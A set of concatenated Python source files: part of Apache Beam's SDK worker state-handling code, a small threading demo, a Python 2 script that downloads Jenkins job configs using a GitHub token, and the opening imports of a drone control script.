  def process_bundle_progress(
      self,
      request,  # type: beam_fn_api_pb2.ProcessBundleProgressRequest
      instruction_id  # type: str
  ):
    # type: (...) -> beam_fn_api_pb2.InstructionResponse
    """Reports current monitoring data for an in-flight bundle."""
    try:
      processor = self.bundle_processor_cache.lookup(request.instruction_id)
    except RuntimeError:
      # Unknown or failed instruction id -- report the error to the runner.
      return beam_fn_api_pb2.InstructionResponse(
          instruction_id=instruction_id, error=traceback.format_exc())
    if processor:
      self._log_lull_in_bundle_processor(processor)
      monitoring_infos = processor.monitoring_infos()
    else:
      # Return an empty response if we aren't running. This can happen
      # if the ProcessBundleRequest has not started or already finished.
      monitoring_infos = []
    return beam_fn_api_pb2.InstructionResponse(
        instruction_id=instruction_id,
        process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
            monitoring_infos=monitoring_infos,
            monitoring_data={
                SHORT_ID_CACHE.get_short_id(info): info.payload
                for info in monitoring_infos
            }))

  def finalize_bundle(
      self,
      request,  # type: beam_fn_api_pb2.FinalizeBundleRequest
      instruction_id  # type: str
  ):
    # type: (...) -> beam_fn_api_pb2.InstructionResponse
    """Finalizes a bundle whose processing requested finalization, releasing
    its processor on success and discarding it on failure."""
    try:
      processor = self.bundle_processor_cache.lookup(request.instruction_id)
    except RuntimeError:
      # Unknown or failed instruction id -- report the error to the runner.
      return beam_fn_api_pb2.InstructionResponse(
          instruction_id=instruction_id, error=traceback.format_exc())
    if processor:
      try:
        finalize_response = processor.finalize_bundle()
        self.bundle_processor_cache.release(request.instruction_id)
        return beam_fn_api_pb2.InstructionResponse(
            instruction_id=instruction_id, finalize_bundle=finalize_response)
      except:
        self.bundle_processor_cache.discard(request.instruction_id)
        raise
    # We can reach this state if there was an erroneous request to finalize
    # the bundle while it is being initialized or has already been finalized
    # and released.
    raise RuntimeError(
        'Bundle is not in a finalizable state for %s' % instruction_id)

  @contextlib.contextmanager
  def maybe_profile(self, instruction_id):
    # type: (str) -> Iterator[None]
    # Wraps the body in a profiler when a factory is configured and yields a
    # profiler; otherwise a no-op context.
    if self.profiler_factory:
      profiler = self.profiler_factory(instruction_id)
      if profiler:
        with profiler:
          yield
      else:
        yield
    else:
      yield
class StateHandler(metaclass=abc.ABCMeta):
  """An abstract object representing a ``StateHandler``."""

  @abc.abstractmethod
  def get_raw(
      self,
      state_key,  # type: beam_fn_api_pb2.StateKey
      continuation_token=None  # type: Optional[bytes]
  ):
    # type: (...) -> Tuple[bytes, Optional[bytes]]
    """Reads raw state for ``state_key``, returning a (data,
    continuation_token) pair; a non-None token means more data remains."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def append_raw(
      self,
      state_key,  # type: beam_fn_api_pb2.StateKey
      data  # type: bytes
  ):
    # type: (...) -> _Future
    """Appends raw ``data`` to the state for ``state_key``; returns a future
    for the completion of the write."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def clear(self, state_key):
    # type: (beam_fn_api_pb2.StateKey) -> _Future
    """Clears all state for ``state_key``; returns a future for completion."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id):
    # type: (str) -> Iterator[None]
    """Context manager scoping state requests to the given bundle id."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def done(self):
    # type: () -> None
    """Signals that no more state requests will be made."""
    raise NotImplementedError(type(self))
class StateHandlerFactory(metaclass=abc.ABCMeta):
  """An abstract factory for creating ``StateHandler``."""
  # NOTE(review): the previous docstring said "creating ``DataChannel``",
  # which does not match what create_state_handler below returns.
  @abc.abstractmethod
  def create_state_handler(self, api_service_descriptor):
    # type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
    """Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def close(self):
    # type: () -> None
    """Close all channels that this factory owns."""
    raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
  """A factory for ``GrpcStateHandler``.

  Caches the created channels by ``state descriptor url``.
  """
  def __init__(self, state_cache, credentials=None):
    # type: (StateCache, Optional[grpc.ChannelCredentials]) -> None
    self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
    # Guards lazy handler creation in create_state_handler.
    self._lock = threading.Lock()
    # Returned for descriptors without a state service; errors on any use.
    self._throwing_state_handler = ThrowingStateHandler()
    # None means an insecure (plaintext) channel is created.
    self._credentials = credentials
    self._state_cache = state_cache

  def create_state_handler(self, api_service_descriptor):
    # type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
    """Returns the (cached) state handler for the descriptor's URL.

    Uses a check / lock / re-check sequence so at most one handler is
    built per URL even under concurrent callers.
    """
    if not api_service_descriptor:
      return self._throwing_state_handler
    url = api_service_descriptor.url
    if url not in self._state_handler_cache:
      with self._lock:
        if url not in self._state_handler_cache:
          # Options to have no limits (-1) on the size of the messages
          # received or sent over the data plane. The actual buffer size is
          # controlled in a layer above.
          options = [('grpc.max_receive_message_length', -1),
                     ('grpc.max_send_message_length', -1)]
          if self._credentials is None:
            _LOGGER.info('Creating insecure state channel for %s.', url)
            grpc_channel = GRPCChannelFactory.insecure_channel(
                url, options=options)
          else:
            _LOGGER.info('Creating secure state channel for %s.', url)
            grpc_channel = GRPCChannelFactory.secure_channel(
                url, self._credentials, options=options)
          _LOGGER.info('State channel established.')
          # Add workerId to the grpc channel
          grpc_channel = grpc.intercept_channel(
              grpc_channel, WorkerIdInterceptor())
          self._state_handler_cache[url] = GlobalCachingStateHandler(
              self._state_cache,
              GrpcStateHandler(
                  beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
    return self._state_handler_cache[url]

  def close(self):
    # type: () -> None
    """Shuts down every cached handler and evicts the state cache."""
    _LOGGER.info('Closing all cached gRPC state handlers.')
    for _, state_handler in self._state_handler_cache.items():
      state_handler.done()
    self._state_handler_cache.clear()
    self._state_cache.evict_all()
class CachingStateHandler(metaclass=abc.ABCMeta):
  """Abstract state handler operating on decoded values (via a coder).

  Counterpart to ``StateHandler``, which operates on raw bytes.
  """
  @abc.abstractmethod
  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id, cache_tokens):
    # type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
    """Scopes state requests, and their cache tokens, to ``bundle_id``."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def blocking_get(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder, # type: coder_impl.CoderImpl
  ):
    # type: (...) -> Iterable[Any]
    """Synchronously returns the decoded values stored under ``state_key``."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def extend(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder, # type: coder_impl.CoderImpl
      elements, # type: Iterable[Any]
  ):
    # type: (...) -> _Future
    """Appends ``elements`` (encoded with ``coder``) under ``state_key``."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def clear(self, state_key):
    # type: (beam_fn_api_pb2.StateKey) -> _Future
    """Clears all values stored under ``state_key``; returns a ``_Future``."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def done(self):
    # type: () -> None
    """Releases any resources held by this handler."""
    raise NotImplementedError(type(self))
class ThrowingStateHandler(CachingStateHandler):
  """A caching state handler that rejects every request.

  Used when a bundle descriptor carries no state ApiServiceDescriptor, so
  any attempt to access state surfaces as an explicit error.
  """
  @staticmethod
  def _reject(state_key):
    # type: (beam_fn_api_pb2.StateKey) -> None
    # Single home for the error shared by all key-based operations.
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor without '
        'state ApiServiceDescriptor for state key %s.' % state_key)

  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id, cache_tokens):
    # type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor '
        'for bundle id %s.' % bundle_id)

  def blocking_get(self, state_key, coder):
    # type: (beam_fn_api_pb2.StateKey, coder_impl.CoderImpl) -> Iterable[Any]
    self._reject(state_key)

  def extend(self, state_key, coder, elements):
    # type: (beam_fn_api_pb2.StateKey, coder_impl.CoderImpl, Iterable[Any]) -> _Future
    self._reject(state_key)

  def clear(self, state_key):
    # type: (beam_fn_api_pb2.StateKey) -> _Future
    self._reject(state_key)

  def done(self):
    # type: () -> None
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor.')
class GrpcStateHandler(StateHandler):
  """State handler that talks to the runner over a gRPC BeamFnState stream.

  Outgoing requests are queued and streamed by the gRPC machinery; a
  background thread reads responses and completes the matching futures.
  """

  # Sentinel placed on the request queue to unblock and stop the stream.
  _DONE = Sentinel.sentinel

  def __init__(self, state_stub):
    # type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
    # Protects _last_id; see _next_id.
    self._lock = threading.Lock()
    self._state_stub = state_stub
    # Outgoing requests, consumed by request_iter() in start().
    self._requests = queue.Queue(
    ) # type: queue.Queue[Union[beam_fn_api_pb2.StateRequest, Sentinel]]
    # Maps request id -> future, completed by the response-reader thread.
    self._responses_by_id = {} # type: Dict[str, _Future]
    self._last_id = 0
    # Set by the reader thread if the response stream fails; re-raised on
    # the caller's thread in _blocking_request.
    self._exc_info = None # type: Optional[OptExcInfo]
    # Thread-local so each worker thread binds its own instruction id.
    self._context = threading.local()
    self.start()

  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id):
    # type: (str) -> Iterator[None]
    """Tags every request made inside the context with ``bundle_id``."""
    if getattr(self._context, 'process_instruction_id', None) is not None:
      raise RuntimeError(
          'Already bound to %r' % self._context.process_instruction_id)
    self._context.process_instruction_id = bundle_id
    try:
      yield
    finally:
      self._context.process_instruction_id = None

  def start(self):
    # type: () -> None
    """Opens the bidirectional State stream and starts the reader thread."""
    self._done = False

    def request_iter():
      # type: () -> Iterator[beam_fn_api_pb2.StateRequest]
      # Generator fed to gRPC: blocks on the queue until a request (or the
      # _DONE sentinel) arrives.
      while True:
        request = self._requests.get()
        if request is self._DONE or self._done:
          break
        yield request

    responses = self._state_stub.State(request_iter())

    def pull_responses():
      # type: () -> None
      try:
        for response in responses:
          # Popping an item from a dictionary is atomic in cPython
          future = self._responses_by_id.pop(response.id)
          future.set(response)
          if self._done:
            break
      except: # pylint: disable=bare-except
        # Record the failure so waiting callers can observe it.
        self._exc_info = sys.exc_info()
        raise

    reader = threading.Thread(target=pull_responses, name='read_state')
    reader.daemon = True
    reader.start()

  def done(self):
    # type: () -> None
    """Stops the stream; the sentinel unblocks the request iterator."""
    self._done = True
    self._requests.put(self._DONE)

  def get_raw(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      continuation_token=None # type: Optional[bytes]
  ):
    # type: (...) -> Tuple[bytes, Optional[bytes]]
    """Synchronously reads one page of raw state data."""
    response = self._blocking_request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key,
            get=beam_fn_api_pb2.StateGetRequest(
                continuation_token=continuation_token)))
    return response.get.data, response.get.continuation_token

  def append_raw(
      self,
      state_key, # type: Optional[beam_fn_api_pb2.StateKey]
      data # type: bytes
  ):
    # type: (...) -> _Future
    """Asynchronously appends raw bytes; returns the pending future."""
    return self._request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key,
            append=beam_fn_api_pb2.StateAppendRequest(data=data)))

  def clear(self, state_key):
    # type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
    """Asynchronously clears the state; returns the pending future."""
    return self._request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))

  def _request(self, request):
    # type: (beam_fn_api_pb2.StateRequest) -> _Future[beam_fn_api_pb2.StateResponse]
    """Assigns an id, registers a future and enqueues the request."""
    request.id = self._next_id()
    request.instruction_id = self._context.process_instruction_id
    # Adding a new item to a dictionary is atomic in cPython
    self._responses_by_id[request.id] = future = _Future[
        beam_fn_api_pb2.StateResponse]()
    # Request queue is thread-safe
    self._requests.put(request)
    return future

  def _blocking_request(self, request):
    # type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
    """Sends a request and waits for its response, surfacing stream errors."""
    req_future = self._request(request)
    # Poll with a timeout so reader-thread failures or shutdown are noticed
    # instead of blocking forever.
    while not req_future.wait(timeout=1):
      if self._exc_info:
        t, v, tb = self._exc_info
        if t and v and tb:
          raise t(v).with_traceback(tb)
      elif self._done:
        raise RuntimeError()
    response = req_future.get()
    if response.error:
      raise RuntimeError(response.error)
    else:
      return response

  def _next_id(self):
    # type: () -> str
    """Returns a fresh request id, unique within this handler."""
    with self._lock:
      # Use a lock here because this GrpcStateHandler is shared across all
      # requests which have the same process bundle descriptor. State requests
      # can concurrently access this section if a Runner uses threads / workers
      # (aka "parallelism") to send data to this SdkHarness and its workers.
      self._last_id += 1
      request_id = self._last_id
    return str(request_id)
class GlobalCachingStateHandler(CachingStateHandler):
  """ A State handler which retrieves and caches state.
  If caching is activated, caches across bundles using a supplied cache token.
  If activated but no cache token is supplied, caching is done at the bundle
  level.
  """
  def __init__(
      self,
      global_state_cache, # type: StateCache
      underlying_state # type: StateHandler
  ):
    # type: (...) -> None
    self._underlying = underlying_state
    self._state_cache = global_state_cache
    # Thread-local: cache tokens and the bundle id are bound per thread.
    self._context = threading.local()

  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id, cache_tokens):
    # type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
    """Binds the bundle id and the runner-supplied cache tokens."""
    if getattr(self._context, 'user_state_cache_token', None) is not None:
      raise RuntimeError(
          'Cache tokens already set to %s' %
          self._context.user_state_cache_token)
    self._context.side_input_cache_tokens = {}
    user_state_cache_token = None
    for cache_token_struct in cache_tokens:
      if cache_token_struct.HasField("user_state"):
        # There should only be one user state token present
        assert not user_state_cache_token
        user_state_cache_token = cache_token_struct.token
      elif cache_token_struct.HasField("side_input"):
        # Side input tokens are keyed by (transform_id, side_input_id).
        self._context.side_input_cache_tokens[
            cache_token_struct.side_input.transform_id,
            cache_token_struct.side_input.
            side_input_id] = cache_token_struct.token
    # TODO: Consider a two-level cache to avoid extra logic and locking
    # for items cached at the bundle level.
    self._context.bundle_cache_token = bundle_id
    try:
      self._state_cache.initialize_metrics()
      self._context.user_state_cache_token = user_state_cache_token
      with self._underlying.process_instruction_id(bundle_id):
        yield
    finally:
      # Always unbind so the next bundle on this thread starts clean.
      self._context.side_input_cache_tokens = {}
      self._context.user_state_cache_token = None
      self._context.bundle_cache_token = None

  def blocking_get(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder, # type: coder_impl.CoderImpl
  ):
    # type: (...) -> Iterable[Any]
    """Returns the decoded values under ``state_key``, via the cache if on."""
    cache_token = self._get_cache_token(state_key)
    if not cache_token:
      # Cache disabled / no cache token. Can't do a lookup/store in the cache.
      # Fall back to lazily materializing the state, one element at a time.
      return self._lazy_iterator(state_key, coder)
    # Cache lookup
    cache_state_key = self._convert_to_cache_key(state_key)
    cached_value = self._state_cache.get(cache_state_key, cache_token)
    if cached_value is None:
      # Cache miss, need to retrieve from the Runner
      # Further size estimation or the use of the continuation token on the
      # runner side could fall back to materializing one item at a time.
      # https://jira.apache.org/jira/browse/BEAM-8297
      materialized = cached_value = (
          self._partially_cached_iterable(state_key, coder))
      if isinstance(materialized, (list, self.ContinuationIterable)):
        self._state_cache.put(cache_state_key, cache_token, materialized)
      else:
        _LOGGER.error(
            "Uncacheable type %s for key %s. Not caching.",
            materialized,
            state_key)
    return cached_value

  def extend(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder, # type: coder_impl.CoderImpl
      elements, # type: Iterable[Any]
  ):
    # type: (...) -> _Future
    """Appends ``elements`` to the state, updating any cached copy."""
    cache_token = self._get_cache_token(state_key)
    if cache_token:
      # Update the cache
      cache_key = self._convert_to_cache_key(state_key)
      cached_value = self._state_cache.get(cache_key, cache_token)
      # Keep in mind that the state for this key can be evicted
      # while executing this function. Either read or write to the cache
      # but never do both here!
      if cached_value is None:
        # We have never cached this key before, first retrieve state
        cached_value = self.blocking_get(state_key, coder)
      # Just extend the already cached value
      if isinstance(cached_value, list):
        # Materialize provided iterable to ensure reproducible iterations,
        # here and when writing to the state handler below.
        elements = list(elements)
        # The state is fully cached and can be extended
        cached_value.extend(elements)
      elif isinstance(cached_value, self.ContinuationIterable):
        # The state is too large to be fully cached (continuation token used),
        # only the first part is cached, the rest if enumerated via the runner.
        pass
      else:
        # When a corrupt value made it into the cache, we have to fail.
        raise Exception("Unexpected cached value: %s" % cached_value)
    # Write to state handler
    out = coder_impl.create_OutputStream()
    for element in elements:
      coder.encode_to_stream(element, out, True)
    return self._underlying.append_raw(state_key, out.get())

  def clear(self, state_key):
    # type: (beam_fn_api_pb2.StateKey) -> _Future
    """Clears the state and invalidates any cached copy first."""
    cache_token = self._get_cache_token(state_key)
    if cache_token:
      cache_key = self._convert_to_cache_key(state_key)
      self._state_cache.clear(cache_key, cache_token)
    return self._underlying.clear(state_key)

  def done(self):
    # type: () -> None
    """Shuts down the underlying state handler."""
    self._underlying.done()

  def _lazy_iterator(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder, # type: coder_impl.CoderImpl
      continuation_token=None # type: Optional[bytes]
  ):
    # type: (...) -> Iterator[Any]
    """Materializes the state lazily, one element at a time.
    :return A generator which returns the next element if advanced.
    """
    while True:
      # Fetch one page of raw bytes, then decode it element by element.
      data, continuation_token = (
          self._underlying.get_raw(state_key, continuation_token))
      input_stream = coder_impl.create_InputStream(data)
      while input_stream.size() > 0:
        yield coder.decode_from_stream(input_stream, True)
      if not continuation_token:
        break

  def _get_cache_token(self, state_key):
    # type: (beam_fn_api_pb2.StateKey) -> Optional[bytes]
    """Chooses the cache token for this key, or None when caching is off."""
    if not self._state_cache.is_cache_enabled():
      return None
    elif state_key.HasField('bag_user_state'):
      # Prefer the runner-provided user-state token; fall back to caching
      # only for the lifetime of this bundle.
      if self._context.user_state_cache_token:
        return self._context.user_state_cache_token
      else:
        return self._context.bundle_cache_token
    elif state_key.WhichOneof('type').endswith('_side_input'):
      side_input = getattr(state_key, state_key.WhichOneof('type'))
      return self._context.side_input_cache_tokens.get(
          (side_input.transform_id, side_input.side_input_id),
          self._context.bundle_cache_token)
    return None

  def _partially_cached_iterable(
      self,
      state_key, # type: beam_fn_api_pb2.StateKey
      coder # type: coder_impl.CoderImpl
  ):
    # type: (...) -> Iterable[Any]
    """Materialized the first page of data, concatenated with a lazy iterable
    of the rest, if any.
    """
    data, continuation_token = self._underlying.get_raw(state_key, None)
    # Decode the whole first page eagerly.
    head = []
    input_stream = coder_impl.create_InputStream(data)
    while input_stream.size() > 0:
      head.append(coder.decode_from_stream(input_stream, True))

    if not continuation_token:
      return head
    else:
      return self.ContinuationIterable(
          head,
          functools.partial(
              self._lazy_iterator, state_key, coder, continuation_token))

  class ContinuationIterable(Generic[T]):
    # Re-iterable view: the cached head is replayed, the tail is re-fetched
    # via continue_iterator_fn on every new iteration.
    def __init__(self, head, continue_iterator_fn):
      # type: (Iterable[T], Callable[[], Iterable[T]]) -> None
      self.head = head
      self.continue_iterator_fn = continue_iterator_fn

    def __iter__(self):
      # type: () -> Iterator[T]
      for item in self.head:
        yield item
      for item in self.continue_iterator_fn():
        yield item

  @staticmethod
  def _convert_to_cache_key(state_key):
    # type: (beam_fn_api_pb2.StateKey) -> bytes
    """Serializes the protobuf key for use as a cache key."""
    return state_key.SerializeToString()
class _Future(Generic[T]):
  """A simple future object to implement blocking requests.

  ``set`` publishes the value and wakes all waiters; ``get`` blocks until
  the value is available, raising ``LookupError`` on timeout.
  """
  def __init__(self):
    # type: () -> None
    self._ready = threading.Event()

  def wait(self, timeout=None):
    # type: (Optional[float]) -> bool
    return self._ready.wait(timeout)

  def get(self, timeout=None):
    # type: (Optional[float]) -> T
    if not self.wait(timeout):
      raise LookupError()
    return self._value

  def set(self, value):
    # type: (T) -> None
    self._value = value
    self._ready.set()

  @classmethod
  def done(cls):
    # type: () -> _Future[None]
    # Lazily create a single, shared, already-completed future.
    if not hasattr(cls, 'DONE'):
      completed = _Future[None]()
      completed.set(None)
      cls.DONE = completed # type: ignore[attr-defined]
    return cls.DONE # type: ignore[attr-defined]
class KeyedDefaultDict(DefaultDict[_KT, _VT]):
  """A defaultdict whose factory is called with the missing key.

  Unlike ``collections.defaultdict``, ``default_factory`` takes the key as
  an argument, allowing per-key default values.
  """
  if TYPE_CHECKING:
    # we promise to only use a subset of what DefaultDict can do
    def __init__(self, default_factory):
      # type: (Callable[[_KT], _VT]) -> None
      pass

  def __missing__(self, key):
    # type: (_KT) -> _VT
    # typing: default_factory takes an arg, but the base class does not
    self[key] = self.default_factory(key) # type: ignore # pylint: disable=E1137
    return self[key]
|
th2.py | import threading
import time
def get_info_1(name, age, job):
    """Print the given person info along with the executing thread's name.

    Sleeps 4 seconds first so the interleaving with other threads is visible.
    """
    time.sleep(4)
    # threading.currentThread() / getName() are deprecated aliases (since
    # Python 3.10); use current_thread() and the .name attribute instead.
    thread_name = threading.current_thread().name
    print(f"{name} | {age} | {job} --> {thread_name}")
def get_info_2(name, age, job):
    """Print the given person info along with the executing thread's name.

    Sleeps 1 second first so this thread finishes before get_info_1.
    """
    time.sleep(1)
    # threading.currentThread() / getName() are deprecated aliases (since
    # Python 3.10); use current_thread() and the .name attribute instead.
    thread_name = threading.current_thread().name
    print(f"{name} | {age} | {job} --> {thread_name}")
# get_info('moahammad', 20, 'developer )
# Demo: positional arguments are passed to the target via ``args``.
th_1 = threading.Thread(target=get_info_1, args=('mohammad',20, 'developer'), name='info1')
# get_info(name='mohammad', job='developer')
# Demo: keyword arguments are passed to the target via ``kwargs``.
th_2 = threading.Thread(target=get_info_2, kwargs={'name': 'mohammad','age':19, 'job': 'ML'}, name='info2')
# Start both threads; info2 prints first because it sleeps for less time.
th_1.start()
th_2.start()
coreclr_config_download.py | #! /usr/bin/env python
################################################################################
################################################################################
#
# Module coreclr_config_download.py
#
# Notes:
#
# Simple script to grab all of the config.xml files for jobs.
#
################################################################################
################################################################################
import argparse
import datetime
import json
import multiprocessing
import os
import re
import subprocess
import sys
import shutil
import tempfile
import threading
import time
import urllib2
import zipfile
from collections import defaultdict
from multiprocessing import Process, Queue, Pipe
################################################################################
# Argument Parser
################################################################################
# Command-line interface.  ``-sim_connections`` stays a string here; main()
# converts it with int(), so both the int default and string values work.
description = """Simple script to grab all of the config.xml files for jobs.
Note that the api_token can either be the token or the path to
a file containing the token.
If you are having a problem with connecting, try downloading the
baseline only, then download the diff only after waiting a little.
Github will unfortunately rate limit OAuth connections.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-api_token", dest="api_token", nargs='?', default=None, help="Github API Token. Can be the path to a file or string.")
parser.add_argument("-branch", dest="branch", nargs='?', default="")
parser.add_argument("-output_location", dest="output_location", nargs='?', default="output")
parser.add_argument("-sim_connections", dest="sim_connections", nargs='?', default=multiprocessing.cpu_count(), help="The number of parallel connections to launch.")
parser.add_argument("-username", dest="username", nargs='?', default=None, help="Github username for the API Token.")
parser.add_argument("--baseline_only", dest="baseline_only", action="store_true", default=False, help="Download the baseline config files only.")
parser.add_argument("--diff_only", dest="diff_only", action="store_true", default=False, help="Download the diff config files only.")
################################################################################
# Classes
################################################################################
class HttpBasic403AuthorizationHandler(urllib2.HTTPBasicAuthHandler):
    """Basic authorization handler that retries authentication on HTTP 403.

    The stock ``HTTPBasicAuthHandler`` only reacts to 401 responses; this
    subclass applies the same retry logic when the server answers 403.
    """
    def http_error_403(self, request, handle, code, message, headers):
        # NOTE(review): ``page`` is computed but unused.
        page = request.get_full_url()
        host = request.get_host()
        # No realm information is extracted from a 403 response.
        realm = None
        return self.retry_http_basic_auth(host, request, realm)
class AuthenticatWithGithubApiToken:
    """Class to abstract connecting to jenkins via an authenticated github token

    Python 2 source (uses ``urllib2`` and py2 except syntax).
    """
    def __init__(self, username, api_token):
        self.username = username
        self.api_token = api_token
        # Created lazily by authenticate(); also serves as an
        # "already authenticated" flag.
        self.auth_handler = None

    def authenticate(self):
        """Authenticate when we receive a error 403 response.
        Args:
            None
        Returns:
            None
        Notes:
            Can only be called once.
        """
        # Make sure we are only authenticating once
        assert self.auth_handler is None

        # Create and install the 403 handler
        self.auth_handler = HttpBasic403AuthorizationHandler()
        opener = urllib2.build_opener(self.auth_handler)
        urllib2.install_opener(opener)

        # Note at this point the opener is installed. However,
        # there still needs to be an authentication
        url = "https://ci.dot.net"
        self.auth_handler.add_password(realm=None, uri=url, user=self.username, passwd=self.api_token)

        # Try a quick connection
        auth_url = "%s/configure" % url

        try:
            result = urllib2.urlopen(auth_url)
            assert result.code == 200
        except urllib2.HTTPError, error:
            # 401 means the token itself was rejected; anything else is a
            # generic transport/HTTP problem and is re-raised as-is.
            assert error.code != 401, 'Error: api-token was rejected.'
            # Else this was a generic error related to sending the HttpRequest
            raise error
class Job:
    """Class to abstract a jenkins job

    Wraps a job's name and URL and can download/persist its config.xml.
    """
    def __init__(self, job_name, job_url):
        self.job_name = job_name
        self.job_url = job_url

    def get_config_file(self, output_location):
        """ For a job get the config file.
        Args:
            output_location (str): folder checked for an existing local copy
        Returns:
            config_xml (str): config.xml contents.
        """
        location = os.path.join(output_location, "%s.xml" % self.job_name)

        # We may be redownloading because the download was interupted.
        # skip this file because we already have a copy.
        if os.path.isfile(location):
            print "Skipping: %s.xml. Item exists. If this is unexpected please delete the output folder." % self.job_name
            config_xml = None
            with open(location) as file_handle:
                config_xml = file_handle.read().strip()
            return config_xml

        # job_url already ends with a slash, so append the file name directly.
        url = "%sconfig.xml" % self.job_url
        connection = urllib2.urlopen(url)
        config_xml = connection.read()
        connection.close()

        return config_xml

    def write_config_file(self, output_location, config_xml):
        """ Write the config xml output for a job.
        Args:
            output_location (str): Must be a valid output folder
            config_xml (str): contents to write
        Returns
            None
        Notes:
            The file will be named <job_name>.xml
        """
        assert os.path.isdir(output_location)

        path = os.path.join(output_location, "%s.xml" % self.job_name)
        with open(path, 'w') as file_handle:
            file_handle.write(config_xml)
################################################################################
# Helper Functions
################################################################################
def get_jobs_from_json(json_obj):
    """ Given a jenkins api json object return the list of jobs
    Args:
        json_obj: json returned from a jenkins api call.
    Returns:
        jobs ([Job]): jobs that jenkins currently has
    Notes:
        Folders (except the excluded ones) are expanded recursively via
        their own api/json listing.
    """
    excluded_folders = ["GenPRTest"]
    collected = []
    for entry in json_obj["jobs"]:
        is_folder = "Folder" in entry["_class"]
        if is_folder and entry["name"] not in excluded_folders:
            # Recurse into the folder's job listing.
            collected.extend(get_jobs_from_json(read_api("%sapi/json" % entry["url"])))
        else:
            collected.append(Job(entry["name"], entry["url"]))
    return collected
def read_api(url):
    """ Given a valid jenkins api url read the json returned
    Args:
        url (str): url to read. Must be a valid jenkins api url
    Returns:
        json (json_obj): json read from the connection
    """
    handle = urllib2.urlopen(url)
    payload = handle.read()
    handle.close()
    return json.loads(payload)
def main(args):
    """Download the config.xml of every Jenkins job for the chosen branch.

    Depending on the flags, downloads the baseline job set, the GenPRTest
    (diff) job set, or both, using up to ``sim_connections`` daemon threads.
    """
    api_token = args.api_token
    branch = args.branch
    output_location = args.output_location
    sim_connections = args.sim_connections
    username = args.username
    baseline_only = args.baseline_only
    diff_only = args.diff_only

    valid_branches = ["master",
                      "release_1.0.0",
                      "release_1.1.0",
                      "release_2.0.0",
                      "dev_unix_test_workflow"]

    assert branch in valid_branches, "Error branch: %s is invalid." % branch
    assert username is not None, "Error username expected."
    assert api_token is not None, "Error a valid api token is required."
    assert (baseline_only and diff_only) is False, "Error, both baseline only and diff only cannot be set."

    # The api_token argument may be a path to a file holding the token.
    if os.path.isfile(api_token):
        with open(api_token) as file_handle:
            api_token = file_handle.read().strip()

    if not os.path.isdir(output_location):
        os.mkdir(output_location)

    authenticator = AuthenticatWithGithubApiToken(username, api_token)
    authenticator.authenticate()

    # Number of download threads started between join_threads() calls.
    step = int(sim_connections)

    old_output_location = os.path.join(output_location, "base")
    new_output_location = os.path.join(output_location, "diff")

    main_rest_url = "https://ci.dot.net/job/dotnet_coreclr/job/%s/api/json" % branch
    prtest_url = "https://ci.dot.net/job/dotnet_coreclr/job/%s/job/GenPRTest/api/json" % branch

    locations = [main_rest_url, prtest_url]
    outputs = [old_output_location, new_output_location]

    if baseline_only is True:
        locations = [main_rest_url]
        outputs = [old_output_location]
    elif diff_only is True:
        locations = [prtest_url]
        outputs = [new_output_location]

    for index, output_dir in enumerate(outputs):
        if not os.path.isdir(output_dir):
            os.mkdir(output_dir)

        jobs = get_jobs_from_json(read_api(locations[index]))

        def write_config_file(output_location, job):
            """Worker function for the multithreading
            """
            job.write_config_file(output_location, job.get_config_file(output_location))

        def join_threads():
            """ Simple method to join all threads
            """
            main_thread = threading.currentThread()
            for thread_handle in threading.enumerate():
                if thread_handle is main_thread:
                    continue
                thread_handle.join()

        # NOTE(review): this loop shadows the outer ``index`` variable;
        # harmless here because the outer index is not used afterwards.
        for index, job in enumerate(jobs):
            print "Starting: %s [%d of %d]" % (job.job_name, index + 1, len(jobs))
            thread_handle = threading.Thread(target=write_config_file, args=(output_dir, job))
            thread_handle.setDaemon(True)
            thread_handle.start()

            # Join every step
            if index % step == 0:
                join_threads()

        join_threads()
################################################################################
# __main__ (entry point)
################################################################################
# Script entry point: parse the command line and run the downloader.
if __name__ == "__main__":
    main(parser.parse_args(sys.argv[1:]))
script.py | import pygame
import cv2
import numpy as np
import time
import os
from mydronesdk.ddpg_yolo_control.yolo.utils import get_yolo_boxes
